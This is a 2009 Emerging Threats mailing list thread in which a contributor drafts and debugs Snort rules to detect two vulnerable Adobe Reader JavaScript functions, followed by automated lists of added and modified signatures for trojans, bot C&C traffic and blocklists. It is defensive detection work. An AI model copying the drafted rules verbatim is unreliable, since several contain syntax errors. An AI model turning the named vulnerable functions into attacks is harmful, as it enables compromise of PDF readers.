From randolphdavidn at gmail.com  Fri May  1 10:18:33 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Fri, 1 May 2009 10:18:33 -0400
Subject: [Emerging-Sigs] Recent Adobe Vulnerabilities BID 34736 and 34740
In-Reply-To: <c13e433a0904301634o72b86f8ar464655d595cd33eb@mail.gmail.com>
References: <d48bb4250904291014g47d88b55reaa3507d5ee0421@mail.gmail.com>
	<49F998AF.50105@jonkmans.com>
	<d48bb4250904300820j5e5e2189w552e7aa27fb8d881@mail.gmail.com>
	<c13e433a0904301634o72b86f8ar464655d595cd33eb@mail.gmail.com>
Message-ID: <d48bb4250905010718m6929fafei808e525bad052bd5@mail.gmail.com>

It looks like it is catching the PoC now. I can't really set my
flow_depth to 0 on my real sensor if it is going to affect performance
like that.

I guess I have these for submission then.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
customDictionaryOpen javascript function"; flow:to_client,established;
content:"customDictionaryOpen"; nocase; reference:bugtraq,34740;
sid:xxxxxx; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
getAnnots javascript function"; flow:to_client,established;
content:"getAnnots"; nocase; bugtraq,34736; sid:xxxxxx; rev:1;)


On Thu, Apr 30, 2009 at 7:34 PM, Will Metcalf <william.metcalf at gmail.com> wrote:
> I think what Matt meant to say was try to set flow_depth or
> server_flow_depth to 0 inside of your http_inspect config to see if they
> hit.? Although if you are using this your IDS performance will go into the
> toilet, but it is a way to test your rule accuracy ;-)....
>
> Regards,
>
> Will
>
> On Thu, Apr 30, 2009 at 10:20 AM, Nick Randolph <randolphdavidn at gmail.com>
> wrote:
>>
>> I just tried it without the flow statements. I have put text files on
>> a local web server that contain the strings I am trying to alert on.
>> The rule triggers on those text files but, not on the PoC from the
>> links. I've even tried copying the PoC from the links to my local web
>> server. Still no alert.
>>
>> On Thu, Apr 30, 2009 at 8:25 AM, Matt Jonkman <jonkman at jonkmans.com>
>> wrote:
>> >
>> > Rules look like they ought to hit. Have you tried testing without the
>> > flow statements just to make sure there's not a reassembly issue going
>> > on?
>> >
>> > Matt
>> >
>> > Nick Randolph wrote:
>> > > http://www.securityfocus.com/bid/34740/info
>> > > http://www.securityfocus.com/bid/34736/info
>> > >
>> > > I'm trying to write some rules to pick up the use of these vulnerable
>> > > functions in PDF.
>> > >
>> > > It is not triggering on the proof of concept that is posted on the
>> > > links
>> > > above.
>> > >
>> > > Here is what I have so far
>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
>> > > spell.customDictionaryOpen Javascript function";
>> > > flow:to_client,established;
>> > > content:"spell|2e|customDictionaryOpen|28|";
>> > > nocase; sid:xxxxxx;)
>> > >
>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
>> > > getAnnots Javascript function"; flow:to_client,established;
>> > > content:"getAnnots|28|"; nocase; sid:xxxxxx;)
>> > >
>> > > Any hints?
>> > >
>> > >
>> > >
>> > > ------------------------------------------------------------------------
>> > >
>> > > _______________________________________________
>> > > Emerging-sigs mailing list
>> > > Emerging-sigs at emergingthreats.net
>> > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> > --
>> > --------------------------------------------
>> > Matthew Jonkman
>> > Emerging Threats
>> > Phone 765-429-0398
>> > Fax 312-264-0205
>> > http://www.emergingthreats.net
>> > --------------------------------------------
>> >
>> > PGP: http://www.jonkmans.com/mattjonkman.asc
>> >
>> >
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>

From randolphdavidn at gmail.com  Fri May  1 10:38:44 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Fri, 1 May 2009 10:38:44 -0400
Subject: [Emerging-Sigs] Recent Adobe Vulnerabilities BID 34736 and 34740
In-Reply-To: <d48bb4250905010718m6929fafei808e525bad052bd5@mail.gmail.com>
References: <d48bb4250904291014g47d88b55reaa3507d5ee0421@mail.gmail.com>
	<49F998AF.50105@jonkmans.com>
	<d48bb4250904300820j5e5e2189w552e7aa27fb8d881@mail.gmail.com>
	<c13e433a0904301634o72b86f8ar464655d595cd33eb@mail.gmail.com>
	<d48bb4250905010718m6929fafei808e525bad052bd5@mail.gmail.com>
Message-ID: <d48bb4250905010738s311c127ci13786d7eeabb1434@mail.gmail.com>

Actually it looks like I forgot to add a few things back in to the
content match.

They should read

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
customDictionaryOpen Javascript function"; flow:to_client,established;
content:"spell|2e|customDictionaryOpen|28|"; nocase;
reference:bugtraq,34740;
sid:xxxxxx; rev:2;

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
getAnnots javascript function"; flow:to_client,established;
content:"getAnnots|28|"; nocase; bugtraq,34736; sid:xxxxxx; rev:1;)


On Fri, May 1, 2009 at 10:18 AM, Nick Randolph <randolphdavidn at gmail.com> wrote:
> It looks like it is catching the PoC now. I can't really set my
> flow_depth to 0 on my real sensor if it is going to affect performance
> like that.
>
> I guess I have these for submission then.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
> customDictionaryOpen javascript function"; flow:to_client,established;
> content:"customDictionaryOpen"; nocase; reference:bugtraq,34740;
> sid:xxxxxx; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
> getAnnots javascript function"; flow:to_client,established;
> content:"getAnnots"; nocase; bugtraq,34736; sid:xxxxxx; rev:1;)
>
>
> On Thu, Apr 30, 2009 at 7:34 PM, Will Metcalf <william.metcalf at gmail.com> wrote:
>> I think what Matt meant to say was try to set flow_depth or
>> server_flow_depth to 0 inside of your http_inspect config to see if they
>> hit.? Although if you are using this your IDS performance will go into the
>> toilet, but it is a way to test your rule accuracy ;-)....
>>
>> Regards,
>>
>> Will
>>
>> On Thu, Apr 30, 2009 at 10:20 AM, Nick Randolph <randolphdavidn at gmail.com>
>> wrote:
>>>
>>> I just tried it without the flow statements. I have put text files on
>>> a local web server that contain the strings I am trying to alert on.
>>> The rule triggers on those text files but, not on the PoC from the
>>> links. I've even tried copying the PoC from the links to my local web
>>> server. Still no alert.
>>>
>>> On Thu, Apr 30, 2009 at 8:25 AM, Matt Jonkman <jonkman at jonkmans.com>
>>> wrote:
>>> >
>>> > Rules look like they ought to hit. Have you tried testing without the
>>> > flow statements just to make sure there's not a reassembly issue going
>>> > on?
>>> >
>>> > Matt
>>> >
>>> > Nick Randolph wrote:
>>> > > http://www.securityfocus.com/bid/34740/info
>>> > > http://www.securityfocus.com/bid/34736/info
>>> > >
>>> > > I'm trying to write some rules to pick up the use of these vulnerable
>>> > > functions in PDF.
>>> > >
>>> > > It is not triggering on the proof of concept that is posted on the
>>> > > links
>>> > > above.
>>> > >
>>> > > Here is what I have so far
>>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
>>> > > spell.customDictionaryOpen Javascript function";
>>> > > flow:to_client,established;
>>> > > content:"spell|2e|customDictionaryOpen|28|";
>>> > > nocase; sid:xxxxxx;)
>>> > >
>>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
>>> > > getAnnots Javascript function"; flow:to_client,established;
>>> > > content:"getAnnots|28|"; nocase; sid:xxxxxx;)
>>> > >
>>> > > Any hints?
>>> > >
>>> > >
>>> > >
>>> > > ------------------------------------------------------------------------
>>> > >
>>> > > _______________________________________________
>>> > > Emerging-sigs mailing list
>>> > > Emerging-sigs at emergingthreats.net
>>> > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>> >
>>> > --
>>> > --------------------------------------------
>>> > Matthew Jonkman
>>> > Emerging Threats
>>> > Phone 765-429-0398
>>> > Fax 312-264-0205
>>> > http://www.emergingthreats.net
>>> > --------------------------------------------
>>> >
>>> > PGP: http://www.jonkmans.com/mattjonkman.asc
>>> >
>>> >
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>
>

From emerging at emergingthreats.net  Fri May  1 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri,  1 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090501200010.C9B794501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri May  1 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (1):
        2009299 || ET TROJAN General Trojan Downloader

     -> Added to emerging-sid-msg.map.txt (1):
        2009299 || ET TROJAN General Trojan Downloader


From emerging at emergingthreats.net  Sat May  2 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  2 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090502200010.E2CD34501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May  2 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (22):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (22):
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From emerging at emergingthreats.net  Sat May  2 18:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  2 May 2009 18:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090502220011.13BBB4501B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May  2 18:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
 2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
 2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
 2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)
 2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)


[///]     Modified active rules:     [///]

 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
 2404000 - ET DROP Known Bot C&C Server Traffic (group 1)  (emerging-botcc.rules)
 2404001 - ET DROP Known Bot C&C Server Traffic (group 2)  (emerging-botcc.rules)
 2404002 - ET DROP Known Bot C&C Server Traffic (group 3)  (emerging-botcc.rules)
 2404003 - ET DROP Known Bot C&C Server Traffic (group 4)  (emerging-botcc.rules)
 2404004 - ET DROP Known Bot C&C Server Traffic (group 5)  (emerging-botcc.rules)
 2404005 - ET DROP Known Bot C&C Server Traffic (group 6)  (emerging-botcc.rules)
 2404006 - ET DROP Known Bot C&C Server Traffic (group 7)  (emerging-botcc.rules)
 2404007 - ET DROP Known Bot C&C Server Traffic (group 8)  (emerging-botcc.rules)
 2404008 - ET DROP Known Bot C&C Server Traffic (group 9)  (emerging-botcc.rules)
 2404009 - ET DROP Known Bot C&C Server Traffic (group 10)  (emerging-botcc.rules)
 2404010 - ET DROP Known Bot C&C Server Traffic (group 11)  (emerging-botcc.rules)
 2404011 - ET DROP Known Bot C&C Server Traffic (group 12)  (emerging-botcc.rules)
 2404012 - ET DROP Known Bot C&C Server Traffic (group 13)  (emerging-botcc.rules)
 2404013 - ET DROP Known Bot C&C Server Traffic (group 14)  (emerging-botcc.rules)
 2404014 - ET DROP Known Bot C&C Server Traffic (group 15)  (emerging-botcc.rules)
 2404015 - ET DROP Known Bot C&C Server Traffic (group 16)  (emerging-botcc.rules)
 2404016 - ET DROP Known Bot C&C Server Traffic (group 17)  (emerging-botcc.rules)
 2404017 - ET DROP Known Bot C&C Server Traffic (group 18)  (emerging-botcc.rules)
 2404018 - ET DROP Known Bot C&C Server Traffic (group 19)  (emerging-botcc.rules)
 2404019 - ET DROP Known Bot C&C Server Traffic (group 20)  (emerging-botcc.rules)
 2404020 - ET DROP Known Bot C&C Server Traffic (group 21)  (emerging-botcc.rules)
 2404021 - ET DROP Known Bot C&C Server Traffic (group 22)  (emerging-botcc.rules)
 2404022 - ET DROP Known Bot C&C Server Traffic (group 23)  (emerging-botcc.rules)
 2404023 - ET DROP Known Bot C&C Server Traffic (group 24)  (emerging-botcc.rules)
 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
 2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules)
 2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules)
 2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules)
 2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules)
 2406036 - ET RBN Known Russian Business Network Monitored Domains (37) (emerging-rbn.rules)
 2406037 - ET RBN Known Russian Business Network Monitored Domains (38) (emerging-rbn.rules)
 2406038 - ET RBN Known Russian Business Network Monitored Domains (39) (emerging-rbn.rules)
 2406039 - ET RBN Known Russian Business Network Monitored Domains (40) (emerging-rbn.rules)
 2406040 - ET RBN Known Russian Business Network Monitored Domains (41) (emerging-rbn.rules)
 2406041 - ET RBN Known Russian Business Network Monitored Domains (42) (emerging-rbn.rules)
 2406042 - ET RBN Known Russian Business Network Monitored Domains (43) (emerging-rbn.rules)
 2406043 - ET RBN Known Russian Business Network Monitored Domains (44) (emerging-rbn.rules)
 2406044 - ET RBN Known Russian Business Network Monitored Domains (45) (emerging-rbn.rules)
 2406045 - ET RBN Known Russian Business Network Monitored Domains (46) (emerging-rbn.rules)
 2406046 - ET RBN Known Russian Business Network Monitored Domains (47) (emerging-rbn.rules)
 2406047 - ET RBN Known Russian Business Network Monitored Domains (48) (emerging-rbn.rules)
 2406048 - ET RBN Known Russian Business Network Monitored Domains (49) (emerging-rbn.rules)
 2406049 - ET RBN Known Russian Business Network Monitored Domains (50) (emerging-rbn.rules)
 2406050 - ET RBN Known Russian Business Network Monitored Domains (51) (emerging-rbn.rules)
 2406051 - ET RBN Known Russian Business Network Monitored Domains (52) (emerging-rbn.rules)
 2406052 - ET RBN Known Russian Business Network Monitored Domains (53) (emerging-rbn.rules)
 2406053 - ET RBN Known Russian Business Network Monitored Domains (54) (emerging-rbn.rules)
 2406054 - ET RBN Known Russian Business Network Monitored Domains (55) (emerging-rbn.rules)
 2406055 - ET RBN Known Russian Business Network Monitored Domains (56) (emerging-rbn.rules)
 2406056 - ET RBN Known Russian Business Network Monitored Domains (57) (emerging-rbn.rules)
 2406057 - ET RBN Known Russian Business Network Monitored Domains (58) (emerging-rbn.rules)
 2406058 - ET RBN Known Russian Business Network Monitored Domains (59) (emerging-rbn.rules)
 2406059 - ET RBN Known Russian Business Network Monitored Domains (60) (emerging-rbn.rules)
 2406060 - ET RBN Known Russian Business Network Monitored Domains (61) (emerging-rbn.rules)
 2406061 - ET RBN Known Russian Business Network Monitored Domains (62) (emerging-rbn.rules)
 2406062 - ET RBN Known Russian Business Network Monitored Domains (63) (emerging-rbn.rules)
 2406063 - ET RBN Known Russian Business Network Monitored Domains (64) (emerging-rbn.rules)
 2406064 - ET RBN Known Russian Business Network Monitored Domains (65) (emerging-rbn.rules)
 2406065 - ET RBN Known Russian Business Network Monitored Domains (66) (emerging-rbn.rules)
 2406066 - ET RBN Known Russian Business Network Monitored Domains (67) (emerging-rbn.rules)
 2406067 - ET RBN Known Russian Business Network Monitored Domains (68) (emerging-rbn.rules)
 2406068 - ET RBN Known Russian Business Network Monitored Domains (69) (emerging-rbn.rules)
 2406069 - ET RBN Known Russian Business Network Monitored Domains (70) (emerging-rbn.rules)
 2406070 - ET RBN Known Russian Business Network Monitored Domains (71) (emerging-rbn.rules)
 2406071 - ET RBN Known Russian Business Network Monitored Domains (72) (emerging-rbn.rules)
 2406072 - ET RBN Known Russian Business Network Monitored Domains (73) (emerging-rbn.rules)
 2406073 - ET RBN Known Russian Business Network Monitored Domains (74) (emerging-rbn.rules)
 2406074 - ET RBN Known Russian Business Network Monitored Domains (75) (emerging-rbn.rules)
